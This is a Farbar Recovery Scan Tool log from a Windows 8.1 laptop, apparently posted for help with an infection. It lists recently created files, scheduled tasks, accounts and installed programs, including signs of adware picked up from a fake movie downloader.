2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
2016-01-09 16:31 - 2016-01-10 20:54 - 00000000 ____D C:\ProgramData\ApplicationHosting
2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
2016-01-07 07:28 - 2016-01-10 20:45 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 21:09 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
2016-01-10 21:09 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-10 21:08 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
2016-01-10 21:08 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
2016-01-10 21:08 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-10 21:08 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
2016-01-10 21:08 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-10 21:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-01-10 20:54 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-10 20:52 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
2016-01-10 20:50 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-10 20:50 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
2016-01-10 20:37 - 2015-10-17 21:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-01-10 20:36 - 2013-08-22 07:36 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-01-10 20:36 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-28 17:04 - 2015-09-16 07:26 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2015-12-27 17:22 - 2015-09-15 07:52 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-12-27 17:22 - 2012-09-03 08:15 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-25 17:54 - 2015-07-20 16:05 - 00000000 ____D C:\ProgramData\Skype
2015-12-24 12:57 - 2015-04-02 18:19 - 00000000 ____D C:\Users\owner\AppData\Local\Steam
2015-12-21 23:27 - 2015-07-20 16:06 - 00000000 ____D C:\Users\owner\AppData\Local\Skype
2015-12-21 23:27 - 2015-07-20 16:05 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:16 - 2012-09-03 08:15 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-12-20 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\ProgramData\NCH Software
2015-12-13 15:06 - 2015-10-26 15:43 - 00000000 ____D C:\Program Files (x86)\NCH Software

==================== Files in the root of some directories =======

2016-01-10 20:41 - 2016-01-10 20:41 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-03 06:38

==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 21:14:05)
Running from E:\
Windows 8.1 (X64) (2015-01-23 06:44:37)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3773202632-424774445-890114178-500 - Administrator - Disabled)
Guest (S-1-5-21-3773202632-424774445-890114178-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3773202632-424774445-890114178-1005 - Limited - Enabled)
owner (S-1-5-21-3773202632-424774445-890114178-1001 - Administrator - Enabled) => C:\Users\owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden
BattleBlock Theater (HKLM-x32\...\Steam App 238460) (Version: - The Behemoth)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bloody Trapland (HKLM-x32\...\Steam App 257750) (Version: - 2Play)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
Broadcom Card Reader Driver Installer (HKLM\...\{F0A7DF2F-0BE0-470F-B137-D7A19F977189}) (Version: 15.4.7.1 - Broadcom Corporation)
Broforce (HKLM-x32\...\Steam App 274190) (Version: - Free Lives)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi SDK - Video 2 (x32 Version: 2.1.1925 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.1.2008 - CyberLink Corp.) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3103_44819 - CyberLink Corp.)
Delicious: Emily's True Love Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.13 - Dolby Laboratories Inc)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM)
ETDWare PS/2-X64 11.6.8.001_WHQL (HKLM\...\Elantech) (Version: 11.6.8.001 - ELAN Microelectronic Corp.)
Express Zip File Compression (HKLM-x32\...\ExpressZip) (Version: 2.40 - NCH Software)
Fallout 3 - The Garden of Eden Creation Kit (HKLM-x32\...\{B343B0E3-212A-40B9-8207-1BD299228F5D}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout 3 (HKLM-x32\...\Steam App 22300) (Version: - Bethesda Game Studios)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gun Monkeys (HKLM-x32\...\Steam App 239450) (Version: - Size Five Games)
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
iCloud (HKLM\...\{B33C558F-772F-4308-A059-390FBF9BAAAE}) (Version: 5.0.2.61 - Apple Inc.)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.5 - Acer Inc.)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3004 - Acer Incorporated)
